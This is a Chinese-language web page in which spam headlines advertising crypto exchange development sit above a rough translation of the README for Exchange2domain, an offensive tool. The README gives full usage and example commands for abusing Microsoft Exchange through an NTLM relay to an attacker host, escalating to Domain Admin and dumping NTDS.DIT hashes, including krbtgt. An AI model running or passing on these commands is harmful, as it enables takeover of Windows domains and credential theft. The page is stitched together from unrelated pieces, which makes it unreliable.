国王小组：数字货币交易所开发中域名管理API调用

Exchange2domain

秒合约交易所开发详细丨秒合约交易所系统开发详细及规则丨秒合约交易所系统源码部署
海外版数字货币交易所系统开发（逻辑及功能）丨多语言数字货币交易所系统开发（案例及源码）
交易所开发成品丨交易所系统开发（演示版）丨交易所APP源码设计
区块链交易所开发详细丨区块链交易所系统开发（开发方案）丨区块链交易所源码案例部署
数字货币交易所开发详情版丨数字货币交易所系统开发（web3.0技术开发）丨数字货币交易所开发源码成品
交易所APP开发功能丨交易所系统开发（成熟及案例）丨交易所系统源码平台

privexchange的所有工具。你只需要打开网络服务器的端口，所以不需要很高的权限。

写得很好!滥用Exchange。离域名管理只有一个API调用。

要求
这些工具需要impacket。你可以用pip install impacket来安装它。

使用方法
usage: Exchange2domain.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]

                      [--hashes HASHES] [--no-ssl]
                      [--exchange-port EXCHANGE_PORT] -ah ATTACKER_HOST
                      [-ap ATTACKER_PORT] -th TARGET_HOST
                      [-exec-method [{smbexec,wmiexec,mmcexec}]]
                      [--exchange-version EXCHANGE_VERSION]
                      [--attacker-page ATTACKER_PAGE]
                      [--just-dc-user USERNAME] [--debug]
                      HOSTNAME

Exchange your privileges for Domain Admin privs by abusing Exchange. Use me
with ntlmrelayx

positional arguments:
HOSTNAME Hostname/ip of the Exchange server

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --user USERNAME

                    username for authentication

-d DOMAIN, --domain DOMAIN

                    domain the user is in (FQDN or NETBIOS domain name)

-p PASSWORD, --password PASSWORD

                    Password for authentication, will prompt if not
                    specified and no NT:NTLM hashes are supplied

--hashes HASHES LM:NLTM hashes
--no-ssl Don't use HTTPS (connects on port 80)
--exchange-port EXCHANGE_PORT

                    Alternative EWS port (default: 443 or 80)

-ah ATTACKER_HOST, --attacker-host ATTACKER_HOST

                    Attacker hostname or IP

-ap ATTACKER_PORT, --attacker-port ATTACKER_PORT

                    Port on which the relay attack runs (default: 80)

-th TARGET_HOST, --target-host TARGET_HOST

                    Hostname or IP of the DC

-exec-method [{smbexec,wmiexec,mmcexec}]

                    Remote exec method to use at target (only when using
                    -use-vss). Default: smbexec

--exchange-version EXCHANGE_VERSION

                    Exchange version of the target (default: Exchange2013,
                    choices:Exchange2010,Exchange2010_SP1,Exchange2010_SP2
                    ,Exchange2013,Exchange2013_SP1,Exchange2016)

--attacker-page ATTACKER_PAGE

                    Page to request on attacker server (default:
                    /privexchange/)

--just-dc-user USERNAME

                    Extract only NTDS.DIT data for the user specified.
                    Only available for DRSUAPI approach.

--debug Enable debug output
example:

python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
f you only want to dump krbtgt, use --just-dc-user.

example:

python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
Update
Auto backup old SD for restore.